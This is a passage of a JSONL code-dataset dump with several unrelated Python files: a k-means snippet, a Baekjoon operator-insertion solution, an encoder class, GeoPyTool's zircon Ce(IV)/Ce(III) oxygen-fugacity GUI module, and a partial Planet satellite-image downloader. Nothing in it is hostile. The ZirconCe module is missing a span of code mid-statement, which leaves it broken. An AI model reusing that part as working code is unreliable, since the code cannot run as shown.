np.array(kmeans.cluster_centers_[:, 0]) * np.array(kmeans.cluster_centers_[:, 1])\n\n# cluster_widths = kmeans.cluster_centers_[np.argsort(cluster_centers_areas), 0]\n# cluster_heights = kmeans.cluster_centers_[np.argsort(cluster_centers_areas), 1]\n\n# print(cluster_widths)\n# print(cluster_heights)\n \n# plt.scatter(cluster_widths, cluster_heights)\n# plt.savefig('kmeans.png')\n\n# plt.hist(all_widths)\n# plt.savefig('all_widths.png')\n\n# plt.hist(all_heights)\n# plt.savefig('all_heights.png')\n\n# print(object_names)\n \n","repo_name":"hajizadeh/MobileDenseNet","sub_path":"kmeans_ground_truth.py","file_name":"kmeans_ground_truth.py","file_ext":"py","file_size_in_byte":4041,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"40909871731","text":"# 글자의 수가 최대 11개 이므로, 사이에 끼워넣는 연산자의 수는 10개이다.\n# 연산자의 종류는 총 4가지 이므로, 최악 시간복잡도가 4 ** 10으로 백만 정도이다.\n# 따라서 완전탐색으로 문제를 해결했다.\nimport sys\nimport math\n\n\ndef search(a, s, m, d, idx, total):\n global answer1, answer2\n # print(a, s, m, d, total)\n if idx == N:\n answer1 = max(answer1, total)\n answer2 = min(answer2, total)\n return\n if a > 0:\n search(a - 1, s, m, d, idx + 1, total + num_list[idx])\n if s > 0:\n search(a, s - 1, m, d, idx + 1, total - num_list[idx])\n if m > 0:\n search(a, s, m - 1, d, idx + 1, total * num_list[idx])\n if d > 0:\n if total < 0:\n temp = (abs(total) // num_list[idx]) * -1\n else:\n temp = total // num_list[idx]\n search(a, s, m, d - 1, idx + 1, temp)\n\n\nN = int(input())\nnum_list = list(map(int, sys.stdin.readline().split()))\nanswer1, answer2 = -1 * math.inf, math.inf\nadd, sub, mul, div = map(int, input().split())\nsearch(add, sub, mul, div, 1, num_list[0])\nprint(answer1)\nprint(answer2)\n","repo_name":"kangmj921/personal_training","sub_path":"백준문제/DFS와 BFS/14888_연산자 끼워넣기.py","file_name":"14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31052315476","text":"from sklearn.preprocessing import LabelBinarizer, OneHotEncoder\nimport pickle\nfrom pathlib import Path\n\n\n_module_path = Path(__file__).parent.parent.parent.resolve()\n_model_path = _module_path / 'model'\n\n\nclass Encoder:\n def __init__(self, verbose: bool = True):\n self.label_encoder = LabelBinarizer()\n self.categorical_features_encoder = OneHotEncoder(sparse=False, handle_unknown='ignore')\n self._verbose = verbose\n\n def save(self, output_folder: Path = _model_path) -> None:\n label_out_file = output_folder / 'label_enc.pkl'\n feature_out_file = output_folder / 'cat_enc.pkl'\n\n if not output_folder.is_dir():\n output_folder.mkdir(parents=True)\n\n with open(label_out_file, 'wb') as label_file:\n pickle.dump(obj=self.label_encoder, file=label_file)\n\n with open(feature_out_file, 'wb') as feature_file:\n pickle.dump(obj=self.categorical_features_encoder, file=feature_file)\n\n if self._verbose:\n print(f\"Saved encoders in {label_out_file.resolve()} and {feature_out_file.resolve()}\")\n\n def load(self, input_folder: Path = _model_path) -> None:\n label_in_file = input_folder / 'label_enc.pkl'\n feature_in_file = input_folder / 'cat_enc.pkl'\n\n with open(label_in_file, 'rb') as label_file:\n label_enc = pickle.load(label_file)\n\n with open(feature_in_file, 'rb') as feature_file:\n feature_enc = pickle.load(file=feature_file)\n\n self.categorical_features_encoder = feature_enc\n self.label_encoder = label_enc\n\n if self._verbose:\n print(f\"Loaded encoders from {label_in_file.resolve()} and {feature_in_file.resolve()}\")\n","repo_name":"smedagli/ml_prod","sub_path":"starter/ml/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35588874118","text":"from ImportDependence import *\nfrom CustomClass import *\n\nclass ZirconCe(QMainWindow):\n _df = pd.DataFrame()\n _changed = False\n\n\n\n xlabel = r'$(r_i/3+r_{Zr}/6)(r_i-r_{Zr})^2 $'\n ylabel = r'$\\log_e D_{Zircon/Base}$'\n\n reference = 'Ballard, J. R., Palin, M. J., and Campbell, I. H., 2002, Relative oxidation states of magmas inferred from Ce(IV)/Ce(III) in zircon: application to porphyry copper deposits of northern Chile: Contributions to Mineralogy and Petrology, v. 144, no. 3, p. 347-364.'\n\n Elements3 = ['La', 'Ce', 'Pr', 'Nd', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu']\n Elements4 = ['Th', 'U', 'Hf', 'Zr', 'Ce4']\n\n\n UsedElements3 = []\n UsedElements4 = []\n\n Ri3 = [1.16, 1.143, 1.126, 1.109, 1.079, 1.066, 1.053, 1.04, 1.027, 1.015, 1.004, 0.994, 0.985, 0.977]\n Ro3 = [0.84 for i in Ri3]\n\n Ri4 = [1.05,1.00 ,0.83 ,0.840,0.97 ]\n Ro4 = [0.84 for i in Ri4]\n\n ZirconZr = 497555\n\n x3=[]\n x4=[]\n\n Zircon = []\n ZirconCe=[]\n Ce3test = []\n DCe3test = []\n Ce4test = []\n DCe4test = []\n Ce4_3_Ratio = []\n\n xCe3 = 0.0479981\n xCe4 = 0.00788412\n\n def __init__(self, parent=None, df=pd.DataFrame()):\n QMainWindow.__init__(self, parent)\n self.setWindowTitle('Oxygen Fugacity Estimation by Ce(IV)/Ce(III) in Zircon (Ballard et al. 2002)')\n\n\n for i in range(len(self.Ri3)):\n self.x3.append((self.Ri3[i] / 3 + self.Ro3[i] / 6) * (self.Ri3[i] - self.Ro3[i]) * (self.Ri3[i] - self.Ro3[i]))\n\n if self.Elements3[i]=='Ce':\n self.xCe3=((self.Ri3[i] / 3 + self.Ro3[i] / 6) * (self.Ri3[i] - self.Ro3[i]) * (self.Ri3[i] - self.Ro3[i]))\n\n for i in range(len(self.Ri4)):\n self.x4.append((self.Ri4[i] / 3 + self.Ro4[i] / 6) * (self.Ri4[i] - self.Ro4[i]) * (self.Ri4[i] - self.Ro4[i]))\n if self.Elements3[i] == 'Ce4':\n self.xCe4=((self.Ri4[i] / 3 + self.Ro4[i] / 6) * (self.Ri4[i] - self.Ro4[i]) * (self.Ri4[i] - self.Ro4[i]))\n\n self._df = pd.DataFrame()\n self.raw = pd.DataFrame()\n\n self._df = df\n self.raw = df\n\n if (len(df) > 0):\n self._changed = True\n # print('DataFrame recieved')\n\n self.create_main_frame()\n self.create_status_bar()\n\n def save_plot(self):\n file_choices = 'pdf Files (*.pdf);;SVG Files (*.svg);;PNG Files (*.png)'\n\n path = QFileDialog.getSaveFileName(self,\n 'Save file', '',\n file_choices)\n if path:\n self.canvas.print_figure(path, dpi=self.dpi)\n self.statusBar().showMessage('Saved to %s' % path, 2000)\n\n def create_main_frame(self):\n\n self.resize(1200, 800)\n self.main_frame = QWidget()\n self.dpi = 128\n self.fig, self.axes = plt.subplots(1, 2, figsize=(12.0, 12.0), dpi=self.dpi)\n self.fig.subplots_adjust(hspace=0.1, wspace=0.1, left=0.1, bottom=0.2, right=0.9, top=0.9)\n self.canvas = FigureCanvas(self.fig)\n self.canvas.setParent(self.main_frame)\n\n self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)\n\n # Other GUI controls\n self.save_img_button = QPushButton('&Save Figure')\n self.save_img_button.clicked.connect(self.saveImgFile)\n\n self.show_data_button = QPushButton('&Show Result')\n self.show_data_button.clicked.connect(self.showResult)\n\n self.save_data_button = QPushButton('&Save Result')\n self.save_data_button.clicked.connect(self.saveResult)\n\n #\n # Layout with box sizers\n #\n self.hbox = QHBoxLayout()\n\n for w in [self.save_img_button, self.show_data_button, self.save_data_button]:\n self.hbox.addWidget(w)\n self.hbox.setAlignment(w, Qt.AlignVCenter)\n\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.mpl_toolbar)\n\n self.vbox.addWidget(self.canvas)\n\n self.vbox.addLayout(self.hbox)\n\n self.textbox = GrowingTextEdit(self)\n self.textbox.setText(self.reference)\n self.vbox.addWidget(self.textbox)\n\n self.main_frame.setLayout(self.vbox)\n self.setCentralWidget(self.main_frame)\n\n def create_status_bar(self):\n self.textbox = QLineEdit(self)\n self.textbox.setText('Reference:' + '\\n' + self.reference)\n self.statusBar().addWidget(self.textbox, 1)\n\n def add_actions(self, target, actions):\n for action in actions:\n if action is None:\n target.addSeparator()\n else:\n target.addAction(action)\n\n def saveImgFile(self):\n ImgFileOutput, ok2 = QFileDialog.getSaveFileName(self,\n '文件保存',\n 'C:/',\n 'pdf Files (*.pdf);;SVG Files (*.svg);;PNG Files (*.png)') # 设置文件扩展名过滤,注意用双分号间隔\n\n if (ImgFileOutput != ''):\n self.canvas.print_figure(ImgFileOutput, dpi=300)\n\n def saveResult(self):\n DataFileOutput, ok2 = QFileDialog.getSaveFileName(self,\n '文件保存',\n 'C:/',\n 'Excel Files (*.xlsx);;CSV Files (*.csv)') # 数据文件保存输出\n\n if (DataFileOutput != ''):\n\n if ('csv' in DataFileOutput):\n self.newdf.to_csv(DataFileOutput, sep=',', encoding='utf-8')\n\n elif ('xls' in DataFileOutput):\n self.newdf.to_excel(DataFileOutput, encoding='utf-8')\n\n def showResult(self):\n\n self.tablepop = TableViewer(df=self.newdf, title='Zircon Ce4_3 Ratio Result')\n self.tablepop.show()\n\n def create_action(self, text, slot=None, shortcut=None,\n icon=None, tip=None, checkable=False,\n signal='triggered()'):\n action = QAction(text, self)\n if icon is not None:\n action.setIcon(QIcon(':/%s.png' % icon))\n if shortcut is not None:\n action.setShortcut(shortcut)\n if tip is not None:\n action.setToolTip(tip)\n action.setStatusTip(tip)\n if slot is not None:\n action.triggered.connect(slot)\n if checkable:\n action.setCheckable(True)\n return action\n\n\n def MultiBallard(self):\n\n self.axes[0].clear()\n self.axes[1].clear()\n\n self.axes[0].spines['right'].set_color('none')\n self.axes[0].spines['top'].set_color('none')\n\n self.axes[1].spines['right'].set_color('none')\n self.axes[1].spines['top'].set_color('none')\n\n self.axes[0].set_xlabel(self.xlabel)\n self.axes[0].set_ylabel(self.ylabel)\n self.axes[1].set_xlabel(self.xlabel)\n self.axes[1].set_ylabel(self.ylabel)\n\n\n\n\n\n\n self.items = self.raw.columns.values.tolist()\n\n self.rows = self.raw.index.values.tolist()\n\n DataX3=[]\n DataX4=[]\n\n Ybase3=[]\n Ybase4=[]\n\n\n self.Base = 0\n\n for i in range(len(self.raw)):\n if (self.raw.at[i, 'DataType'] == 'Base'):\n self.Base = i\n self.BaseCe = self.raw.at[i, 'Ce']\n self.BaseZr = self.raw.at[i, 'Zr']\n\n elif (self.raw.at[i, 'DataType'] == 'Zircon'):\n self.Zircon.append(i)\n\n\n for i in self.items:\n if i in self.Elements3:\n self.UsedElements3.append(i)\n DataX3.append(self.x3[self.Elements3.index(i)])\n Ybase3.append(self.raw.at[self.Base,i])\n\n elif i in self.Elements4:\n self.UsedElements4.append(i)\n DataX4.append(self.x4[self.Elements4.index(i)])\n Ybase4.append(self.raw.at[self.Base,i])\n\n\n\n\n #np.log(yi / ybase)\n\n\n\n print(self.rows)\n\n self.FittedData=[]\n\n\n\n print('\\n DataX3 ',len(DataX3),'\\n DataX4',len(DataX4))\n\n\n for i in self.rows:\n tmpy3 = []\n tmpy4 = []\n fittmpy3 = []\n fittmpy4 = []\n fitDataX3 = []\n fitDataX4 = []\n if i != self.Base:\n self.ZirconCe.append(self.raw.at[i, 'Ce'])\n\n\n for j in self.UsedElements3:\n if len(tmpy3)', connectionstyle='arc3,rad=0'))\n for k in range(len(DataX4)):\n self.axes[1].annotate(self.UsedElements4[k], xy=(DataX4[k], tmpy4[k]), fontsize=6, xytext=(16, 16),\n textcoords='offset points',\n ha='right', va='bottom',\n bbox=dict(boxstyle='round,pad=0.2', fc='red', alpha=0.3),\n arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0'))\n\n tmpy3 = []\n tmpy4 = []\n fittmpy3 = []\n fittmpy4 = []\n fitDataX3 = []\n fitDataX4 = []\n self.canvas.draw()\n\n\n self.DataToWrite = [\n ['Zircon Sample Label', 'Zircon Ce4_3 Ratio', 'Melt Ce4_3 Ratio', 'DCe4', 'DCe3', 'DCe Zircon/Melt'], ]\n for i in range(len(self.ZirconCe)):\n TMP = self.raw.at[self.Zircon[i], 'Label']\n ZirconTmp = (self.BaseCe - self.ZirconCe[i] / self.DCe3test[i]) / (\n self.ZirconCe[i] / self.DCe4test[i] - self.BaseCe)\n MeltTmp = (self.ZirconCe[i] - self.Ce3test[i]) / self.Ce3test[i] * self.DCe3test[i] / self.DCe4test[\n i]\n self.Ce4_3_Ratio.append(ZirconTmp)\n\n if len(self.DataToWrite) < len(DataX3):\n self.DataToWrite.append([TMP, ZirconTmp, MeltTmp, self.DCe4test[i], self.DCe3test[i], self.ZirconCe[i] / self.BaseCe])\n self.newdf = pd.DataFrame(self.DataToWrite)\n\n\n\n\n\n","repo_name":"GeoPyTool/GeoPyTool","sub_path":"geopytool/ZirconCe.py","file_name":"ZirconCe.py","file_ext":"py","file_size_in_byte":12601,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"76"} +{"seq_id":"15208374327","text":"#!/usr/bin/env python\n# Filename: download_planet_img \n\"\"\"\nintroduction:\n\nauthors: Huang Lingcao\nemail:huanglingcao@gmail.com\nadd time: 05 October, 2019\n\"\"\"\n\nimport sys,os\nfrom optparse import OptionParser\n\nHOME = os.path.expanduser('~')\n\n# path of DeeplabforRS\ncodes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'\nsys.path.insert(0, codes_dir2)\n\nimport basic_src.io_function as io_function\nimport basic_src.basic as basic\nimport vector_gpd\nimport basic_src.map_projection as map_projection\n\n# import thest two to make sure load GEOS dll before using shapely\nimport shapely\nfrom shapely.geometry import mapping # transform to GeJSON format\nimport geopandas as gpd\nfrom shapely.geometry import shape\n\nfrom datetime import datetime\nimport json\nimport time\nimport random\n\nimport multiprocessing\nfrom multiprocessing import Pool\nfrom multiprocessing import Process\n\n\nfrom retrying import retry\n\nfrom planet import api\nfrom planet.api.exceptions import APIException\nfrom planet.api import filters\n# ClientV1 provides basic low-level access to Planet’s API. Only one ClientV1 should be in existence for an application.\nclient = None # api.ClientV1(api_key=\"abcdef0123456789\") #\n\n# more on the asset type are available at: https://developers.planet.com/docs/data/psscene4band/\n\nasset_types=['analytic_sr','analytic_xml','udm'] # # surface reflectance, metadata, mask file\n# if analytic_sr not available, we will download analytic (supplementary asset types)\nsupp_asset_types = ['analytic']\n\ndownloaded_scene_geometry = [] # the geometry (extent) of downloaded images\nmanually_excluded_scenes = [] # manually excluded item id\n\ndef p(data):\n print(json.dumps(data, indent=2))\n\ndef get_and_set_Planet_key(user_account):\n keyfile = HOME+'/.planetkey'\n with open(keyfile) as f_obj:\n lines = f_obj.readlines()\n for line in lines:\n if user_account in line:\n key_str = line.split(':')[1]\n key_str = key_str.strip() # remove '\\n'\n os.environ[\"PL_API_KEY\"] = key_str\n # set Planet API client\n global client\n client = api.ClientV1(api_key = key_str)\n\n return True\n raise ValueError('account: %s cannot find in %s'%(user_account,keyfile))\n\ndef search_scenes_on_server(idx, geom, start_date, end_date, cloud_cover_thr,item_types):\n # search and donwload using Planet Client API\n combined_filter = get_a_filter_cli_api(geom, start_date, end_date, cloud_cover_thr)\n\n # get the count number\n item_count = get_items_count(combined_filter, item_types)\n if item_count == 100000:\n basic.outputlogMessage('error, failed to get images of %dth polygon currently, skip it' % idx)\n return False\n basic.outputlogMessage('The total number of scenes is %d' % item_count)\n\n req = filters.build_search_request(combined_filter, item_types)\n # p(req)\n res = client.quick_search(req)\n\n return res, item_count\n\n\ndef get_items_count(combined_filter, item_types):\n '''\n based on the filter, and item types, the count of item\n :param combined_filter: filter\n :param item_types: item types\n :return: the count of items\n '''\n\n try:\n req = filters.build_search_request(combined_filter, item_types, interval=\"year\") #year or day\n stats = client.stats(req).get()\n except APIException as e:\n # basic.outputlogMessage(str(e))\n output_planetAPI_error(str(e))\n return 100000 # return a large number\n\n # p(stats)\n total_count = 0\n for bucket in stats['buckets']:\n total_count += bucket['count']\n return total_count\n\n# try max 1000 times, wait rand from 1 to 10 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=10000)\ndef get_assets_from_server(item):\n '''\n get assets from the servers\n :param item:\n :return:\n '''\n try :\n assets = client.get_assets(item).get()\n # except APIException as e:\n # raise ValueError(\"Manually output the error: \"+str(e))\n except:\n raise APIException\n return assets\n\n# try max 1000 times, wait rand from 1 to 10 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=10000)\ndef activate_a_asset_on_server(asset):\n '''\n activate a asset on the server (make it ready for download)\n :param asset:\n :return:\n '''\n try:\n res = client.activate(asset)\n except APIException as e:\n e_str = str(e)\n output_planetAPI_error(str(e))\n if \"Download quota has been exceeded\" in e_str:\n sys.exit(1) # only exit this sub-process, not\n # quit(1) # may exit the entire program (not working)\n except:\n raise APIException\n\n # print(activation.response.status_code)\n if int(res.response.status_code) == 401:\n basic.outputlogMessage('The account does not have permissions to download this file')\n return False\n\n if int(res.response.status_code) == 429:\n raise Exception(\"rate limit error\")\n return True\n\n# try max 1000 times, wait rand from 1 to 30 seconds\n@retry(stop_max_attempt_number=1000, wait_random_min=1000, wait_random_max=30000)\ndef download_a_asset_from_server(item,assets,asset_key,save_dir):\n '''\n download a asset from the server\n :param item: the item\n :param assets: assets from get_assets_from_server\n :param asset_key: the name of the asset\n :param save_dir: save dir\n :return: True if successful, Flase otherwise\n '''\n\n proc_id = multiprocessing.current_process().pid\n print('Process: %d, start downloading %s (id: %s)'%(proc_id,asset_key,item['id']))\n output_stream = sys.stdout\n def download_progress(start=None,wrote=None,total=None, finish=None): #result,skip=None\n # print(start,wrote,total,finish)\n # if total:\n # # print('received: %.2f K'%(float(total)/1024.0))\n # output_stream.write('received: %.2f K'%(float(total)/1024.0))\n # output_stream.flush()\n # if total:\n # if finish is None:\n # print('received: %.2f K'%(float(total)/1024.0), end='\\r')\n # else:\n # print('received: %.2f K' % (float(total) / 1024.0))\n pass\n callback = api.write_to_file(directory=save_dir + '/', callback=download_progress) # save_dir + '/' #\n body = client.download(assets[asset_key], callback=callback)\n # body.await() for version 1.1.0\n try:\n body.wait() # for version > 1.4.2\n except APIException as e:\n output_planetAPI_error('An APIException occurs when try to download %s (id: %s)'%(asset_key,item['id']))\n output_planetAPI_error(str(e))\n raise Exception(\"rate limit error or other API errors\")\n # return False # return a large number\n except:\n raise APIException\n\n return True\n\n\ndef read_polygons_json(polygon_shp, no_json=False):\n '''\n read polyogns and convert to json format\n :param polygon_shp: polygon in projection of EPSG:4326\n :param no_json: True indicate not json format\n :return:\n '''\n return vector_gpd.read_polygons_json(polygon_shp, no_json)\n\ndef output_planetAPI_error(message):\n logfile = 'planet_APIException.txt'\n timestr = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime() )\n outstr = timestr +': '+ message\n print(outstr)\n f=open(logfile,'a')\n f.writelines(outstr+'\\n')\n f.close()\n\n pass\n\ndef get_a_filter_cli_api(polygon_json,start_date, end_date, could_cover_thr):\n '''\n create a filter based on a geometry, date range, cloud cover\n :param polygon_json: a polygon in json format\n :param start_date: start date\n :param end_date: end date\n :param could_cover_thr: images with cloud cover less than this value\n :return: a combined filter (and filter)\n '''\n\n # gt: Greater Than\n # gte: Greater Than or Equal To\n # lt: Less Than\n # lte: Less Than or Equal To\n\n geo_filter = filters.geom_filter(polygon_json)\n date_filter = filters.date_range('acquired', gte=start_date, lte = end_date)\n cloud_filter = filters.range_filter('cloud_cover', lte=could_cover_thr)\n\n combined_filters = filters.and_filter(geo_filter, date_filter, cloud_filter)\n\n return combined_filters\n\n\ndef activate_and_download_asset(item,assets,asset_key,save_dir,process_num):\n '''\n active a asset of a item and download it\n :param item: the item\n :param assets: assets from get_assets_from_server\n :param asset_key: the name of the asset\n :param save_dir: save dir\n :return: True if successful, Flase otherwise\n '''\n\n proc_id = multiprocessing.current_process().pid\n asset = assets.get(asset_key)\n\n # activate\n out = activate_a_asset_on_server(asset)\n if out is False:\n return False\n\n # wait until the asset has been activated\n asset_activated = False\n while asset_activated == False:\n # Get asset and its activation status\n assets = get_assets_from_server(item) # need to get the status from the server\n asset = assets.get(asset_key)\n asset_status = asset[\"status\"]\n\n # If asset is already active, we are done\n if asset_status == 'active':\n asset_activated = True\n print(\"Process: %d, Asset is active and ready to download\"%proc_id)\n\n # Still activating. Wait and check again.\n else:\n print(\"Process: %d, ...Still waiting for asset activation...\"%proc_id)\n # time.sleep(3)\n waitime = random.randint(process_num, process_num + 30)\n time.sleep(waitime)\n\n return download_a_asset_from_server(item,assets,asset_key,save_dir)\n\n\ndef read_down_load_geometry(folder):\n '''\n read geojson files in a folder. geojson file stores the geometry of a file, and save to global varialbes\n :param folder: the save folder\n :return:\n '''\n global downloaded_scene_geometry\n json_list = io_function.get_file_list_by_ext('.geojson',folder, bsub_folder=False)\n for json_file in json_list:\n\n # ignore the scenes in the excluded list\n item_id = os.path.splitext(os.path.basename(json_file))[0]\n if item_id in manually_excluded_scenes:\n continue\n\n scene_folder = os.path.splitext(json_file)[0]\n asset_files = io_function.get_file_list_by_pattern(scene_folder,'*')\n if len(asset_files) < 3:\n basic.outputlogMessage('downloading of scene %s is not compelte, ignore it'%item_id)\n continue\n\n with open(json_file) as json_file:\n data = json.load(json_file)\n # p(data) # test\n downloaded_scene_geometry.append(data)\n\ndef read_excluded_scenes(folder):\n '''\n manually excluded some scenes with small portion of cloud cover,\n because some of the scenes have cloud cover, but not shown in the metedata\n :param folder:\n :return:\n '''\n txt_path = os.path.join(folder,'manually_excluded_scenes.txt')\n global manually_excluded_scenes\n if os.path.isfile(txt_path):\n with open(txt_path,'r') as f_obj:\n lines = f_obj.readlines()\n for line in lines:\n if '#' in line or len(line) < 6:\n continue\n manually_excluded_scenes.append(line.strip())\n else:\n basic.outputlogMessage('Warning, %s file does not exist'%txt_path)\n\n\ndef check_geom_polygon_overlap(boundary_list, polygon):\n '''\n check if a polygon is covered by any polygons in a geom_list\n :param boundary_list: a list containing polygon\n :param polygon: a polygon\n :return: True if the polygon was cover a polyon by other, False otherwise\n '''\n\n # convert from json format to shapely\n polygon_shapely = shape(polygon)\n\n # using shapely to check the overlay\n for geom in boundary_list:\n geom_shapely = shape(geom)\n if geom_shapely.contains(polygon_shapely):\n return True\n\n return False\n\ndef get_downloadable_assets(scene_item):\n permissions = scene_item['_permissions']\n # e.g., assets.analytic:download remove: assets and download\n valid_assets = [ item.split(':')[0].split('.')[1] for item in permissions]\n return valid_assets\n\ndef select_items_to_download(idx, cloud_cover_thr, polygon, all_items):\n \"\"\"\n choose which item to download\n :param idx: the polygon\n :param cloud_cover_thr, cloud cover threshold\n :param polygon: the polygon\n :param all_items: item list\n :return: item list if find items to download, false otherwise\n \"\"\"\n if len(all_items) < 1:\n basic.outputlogMessage('No inquiry results for %dth polygon' % idx)\n return False\n\n # Update on 5 November 2020\n # for some of the scenes, cloud cover is not the real cloud cover,\n # maybe due to Usable Data Masks https://developers.planet.com/docs/data/udm-2/\n # in this case, we should use 'cloud_percent' (int 0-100), otherwise, use 'cloud_cover' (double, 0-1)\n\n cloud_key = 'cloud_cover' # double 0-1\n cloud_percent_count = 0\n cloud_cover_count = 0\n all_count = len(all_items)\n for item in all_items:\n if 'cloud_percent' in item['properties']:\n cloud_percent_count += 1\n if 'cloud_cover' in item['properties']:\n cloud_cover_count += 1\n\n if cloud_percent_count == all_count:\n cloud_key = 'cloud_percent' # int 0-100\n basic.outputlogMessage('Warning, cloud_percent exists and would be used (cloud_cover will be ignored), maybe these images are acquired after August 2018')\n elif cloud_percent_count > all_count/2:\n cloud_key = 'cloud_percent' # int 0-100\n basic.outputlogMessage('Warning, more than half scenes have cloud_percent (only %d out of %d), %d ones have cloud_cover, cloud_percent will be used'\n %(cloud_percent_count,all_count,cloud_cover_count))\n\n # remove items without cloud_percent\n all_items = [ item for item in all_items if 'cloud_percent' in item['properties']]\n basic.outputlogMessage('Warning, removed %d scenes without cloud_percent, remain %d ones'%(all_count-len(all_items), len(all_items)))\n all_count = len(all_items)\n\n else:\n basic.outputlogMessage('Warning, cloud_percent exists, but only %d out of %d (less than half), %d ones have cloud_cover, cloud_cover will be used'\n % (cloud_percent_count, len(all_items), cloud_cover_count))\n\n\n # sort the item based on cloud cover\n all_items.sort(key=lambda x: float(x['properties'][cloud_key]))\n # [print(item['id'],item['properties'][cloud_key]) for item in all_items]\n\n # for item in all_items:\n # print(item)\n pre_sel_cloud_list = [str(item['properties'][cloud_key]) for item in all_items]\n basic.outputlogMessage('Before selection, could covers after sort: %s'%'_'.join(pre_sel_cloud_list))\n\n # items with surface\n all_items_sr = []\n all_items_NOsr = []\n items_other = []\n for item in all_items:\n valid_assets = get_downloadable_assets(item)\n if 'analytic_sr' in valid_assets:\n all_items_sr.append(item)\n continue\n if 'analytic' in valid_assets:\n all_items_NOsr.append(item)\n else:\n items_other.append(item)\n\n # put the one with 'analytic_sr' before others\n all_items = []\n all_items.extend(all_items_sr)\n all_items.extend(all_items_NOsr)\n all_items.extend(items_other)\n basic.outputlogMessage('Among the scenes, %d, %d, and %d of them have analytic_sr, only have analytic, '\n 'and do not have analytic or analytic_sr asset'%(len(all_items_sr), len(all_items_NOsr),len(items_other)))\n\n # convert from json format to shapely\n polygon_shapely = shape(polygon)\n\n # consider the coverage\n total_intersect_area = 0\n merged_item_extent = None\n selected_items = []\n for item in all_items:\n # print(item['id'])\n if item['id'] in manually_excluded_scenes:\n continue\n\n geom = item['geometry']\n geom_shapely = shape(geom)\n\n # extent the coverage\n if merged_item_extent is None:\n merged_item_extent = geom_shapely\n else:\n # merged_item_extent.union(geom_shapely)\n merged_item_extent = merged_item_extent.union(geom_shapely)\n # merged_item_extent = merged_item_extent.cascaded_union(geom_shapely)\n\n # calculate the intersection\n intersect = polygon_shapely.intersection(merged_item_extent)\n # print('intersect.area',intersect.area, 'total_intersect_area', total_intersect_area, 'polygon_shapely.area',polygon_shapely.area)\n if intersect.area > total_intersect_area:\n total_intersect_area = intersect.area\n selected_items.append(item)\n\n if total_intersect_area >= polygon_shapely.area:\n break\n\n # remove some scenes with cloud cover greater than cloud_cover_thr.\n # We also used cloud_cover_thr (0-1) when inquiring images, this may apply to 'cloud_cover' key (double 0-1), but this 'cloud_cover' may wrong\n # we sort the images based on cloud cover, but still may have some scenes has large cloud cover based on 'cloud_percent'(int 0-100)\n # here, we remove scenes 'cloud_percent' > cloud_cover_thr*100\n if cloud_key == 'cloud_percent':\n cloud_cover_thr_int = int(cloud_cover_thr * 100)\n count_before = len(selected_items)\n selected_items = [item for item in selected_items if item['properties'][cloud_key] < cloud_cover_thr_int ]\n count_after = len(selected_items)\n basic.outputlogMessage('After sorting (cloud), selecting based on geometry, '\n 'still remove %d scenes based on cloud_percent smaller than %d'%((count_before-count_after),cloud_cover_thr_int))\n\n if len(selected_items) < 1:\n basic.outputlogMessage('No inquiry results for %dth polygon after selecting results' % idx)\n return False\n\n sel_cloud_list = [str(item['properties'][cloud_key]) for item in selected_items]\n basic.outputlogMessage('After selection, could covers of images are: %s'%'_'.join(sel_cloud_list))\n\n return selected_items\n\n\ndef check_asset_exist(download_item, asset, save_dir):\n '''\n check weather a asset already exist\n :param download_item:\n :param asset:\n :param save_dir:\n :return:\n '''\n\n # asset_types = ['analytic_sr', 'analytic_xml', 'udm']\n id = download_item['id']\n if asset=='analytic_sr':\n output_name = id + '_3B_AnalyticMS_SR.tif'\n elif asset=='analytic':\n output_name = id + '_3B_AnalyticMS.tif'\n elif asset=='analytic_xml':\n output_name = id + '_3B_AnalyticMS_metadata.xml'\n elif asset=='udm':\n output_name = id + '_3B_AnalyticMS_DN_udm.tif'\n else:\n raise ValueError('unsupported asset type')\n # basic.outputlogMessage('unsupported asset type')\n # return False\n\n if os.path.isfile(os.path.join(save_dir, output_name)):\n basic.outputlogMessage('file %s exist (item id: %s), skip downloading'%(output_name,id))\n return True\n else:\n return False\n\n\n\ndef download_planet_images(polygons_json, start_date, end_date, cloud_cover_thr, item_types, save_folder,process_num):\n '''\n download images from for all polygons, to save quota, each polygon only downlaod one image\n :param polygons_json: a list of polygons in json format\n :param start_date:\n :param end_date:\n :param cloud_cover_thr:\n :param save_folder:\n :return: True if successful, false otherwise\n '''\n\n for idx, geom in enumerate(polygons_json):\n\n # for test\n # if idx > 20: break\n # if idx != 1: continue\n # if idx != 344: continue\n\n ####################################\n #check if any image already cover this polygon, if yes, skip downloading\n if check_geom_polygon_overlap(downloaded_scene_geometry, geom) is True:\n basic.outputlogMessage('%dth polygon already in the extent of downloaded images, skip it'%idx)\n continue\n\n res, item_count = search_scenes_on_server(idx, geom, start_date, end_date, cloud_cover_thr,item_types)\n if res is False:\n continue\n if res.response.status_code == 200:\n all_items = []\n for item in res.items_iter(item_count):\n # print(item['id'], item['properties']['item_type'])\n all_items.append(item)\n\n\n # I want to download SR, level 3B, product\n select_items = select_items_to_download(idx,cloud_cover_thr, geom, all_items)\n if select_items is False:\n continue\n basic.outputlogMessage('After selection, the number of images need to download is %d' % len(select_items))\n if select_items is False:\n continue\n\n sub_tasks = []\n for download_item in select_items:\n download_item_id = download_item['id']\n # p(item['geometry'])\n save_dir = os.path.join(save_folder, download_item_id)\n save_geojson_path = os.path.join(save_folder, download_item_id + '.geojson')\n if os.path.isfile(save_geojson_path) and os.path.isdir(save_dir):\n basic.outputlogMessage('scene %s has been downloaded: %s'%(download_item_id,save_dir))\n continue\n\n os.system('mkdir -p ' + save_dir)\n assets = 